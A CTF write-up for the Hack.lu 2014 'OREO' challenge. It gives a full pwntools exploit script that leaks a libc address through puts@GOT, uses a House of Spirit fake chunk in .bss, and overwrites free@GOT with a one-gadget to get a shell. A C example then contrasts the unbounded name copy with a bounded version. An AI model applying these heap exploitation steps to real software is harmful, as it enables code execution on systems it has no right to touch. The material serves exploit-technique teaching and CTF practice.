cdor1's lab
Hack.lu CTF 2014 OREO
Notes: I exploited it using the House of Spirit vulnerability, by making the allocation land on a fake chunk I had set up.
from pwn import *

s = process('./oreo')
elf = ELF('/home/cdor1/pwnable/oreo')

# Menu 1: add a rifle. The name field is not bounded, so a long name runs
# into the next-rifle pointer stored right after it; the payloads below use
# that to make the rifle list point at addresses of our choosing.
def add(name, des):
    s.sendline('1')
    #print s.recvuntil('Rifle name: ')
    s.sendline(name)
    #print s.recvuntil('Rifle description: ')
    s.sendline(des)
    print s.recvuntil('6. Exit!')

add('AAAA', 'AAAA')
add('BBBB', 'BBBB')
add('CCCC', 'CCCC')

# 27 bytes of padding reach the next pointer; point it at puts@GOT so that
# menu 2 (show rifles) prints the GOT entry as if it were a rifle.
pay1 = 'a'*27
pay1 += p32(elf.got['puts'])
add(pay1, 'CCCC')

s.sendline('2')
print s.recvuntil('Description: ')
print s.recvuntil('Description: ')
leak = u32(s.recv(4))        # libc address of puts
base = leak - 0x6FD60        # libc base (offset of puts in the target libc)
oneshot = base + 0x46428     # one-gadget address in the target libc
log.info('leak : ' + hex(leak))
log.info('base : ' + hex(base))
log.info('oneshot : ' + hex(oneshot))

# House of Spirit: make the next pointer reference a fake chunk in .bss at
# 0x0804A2A8, so that ordering (which frees every rifle) puts it in a fastbin.
pay2 = 'b'*27
pay2 += p32(0x0804A2A8)
add(pay2, 'DDDD')

# Menu 4 (leave a message) writes into .bss; lay out the size values that
# free() sanity-checks around the fake chunk.
pay3 = p32(0)*9
pay3 += p32(0x12c)
pay3 += 'AAAA'
pay3 += p32(0)*10
s.sendline('4')
s.sendline(pay3)

s.sendline('3')   # order: frees all rifles, including the fake chunk

# The next allocation returns the fake chunk; the description written into it
# overwrites the message pointer with free@GOT ...
add('EEEE', p32(elf.got['free']))

# ... so leaving a message now writes the one-gadget address over free@GOT,
s.sendline('4')
s.sendline(p32(oneshot))
s.sendline('3')   # and ordering again calls free(), which jumps to the one-gadget
s.interactive()
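The root cause the payloads above rely on (a name copy that runs past its field into the next-rifle pointer), shown as a small added C example beside a bounded version that keeps the pointer intact. This is not the challenge's source or the write-up's code; the struct layout and field sizes are assumptions reconstructed from the 27-byte padding in pay1/pay2.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Layout reconstructed from the write-up's payload ('a'*27 then a 4-byte
   address): the name field sits right before the next-rifle pointer. The
   field sizes are an assumption for illustration, not the challenge source. */
struct rifle {
    char desc[25];
    char name[27];
    struct rifle *next;
};

/* Vulnerable: copies the whole input line into the 27-byte name field, so an
   over-long line runs on into r->next (the write-up's pay1/pay2 do exactly this). */
static void set_name_unchecked(struct rifle *r, const char *in, size_t len) {
    memcpy((char *)r + offsetof(struct rifle, name), in, len);  /* no bound */
}

/* Hardened: never write more than sizeof(name)-1 bytes and always terminate. */
static void set_name_bounded(struct rifle *r, const char *in, size_t len) {
    size_t n = len < sizeof r->name - 1 ? len : sizeof r->name - 1;
    memcpy(r->name, in, n);
    r->name[n] = '\0';
}

/* Apply one of the two setters and report whether the list link survived. */
int next_survives(int hardened, const char *in, size_t len) {
    struct rifle second = {0}, first = {0};
    first.next = &second;
    if (hardened) set_name_bounded(&first, in, len);
    else          set_name_unchecked(&first, in, len);
    return first.next == &second;
}

/* Constructed over-long name: filler up to the pointer, then a fake address.
   The gap is 27 on the 32-bit target; offsetof keeps it right on 64-bit too. */
int overflow_demo(int hardened) {
    size_t gap = offsetof(struct rifle, next) - offsetof(struct rifle, name);
    char in[64];
    uintptr_t fake = 0x41414141u;
    memset(in, 'a', gap);
    memcpy(in + gap, &fake, sizeof fake);
    return next_survives(hardened, in, gap + sizeof fake);
}

int main(void) {
    printf("unchecked copy keeps next: %d\n", overflow_demo(0)); /* 0 */
    printf("bounded copy keeps next:   %d\n", overflow_demo(1)); /* 1 */
    return 0;
}
```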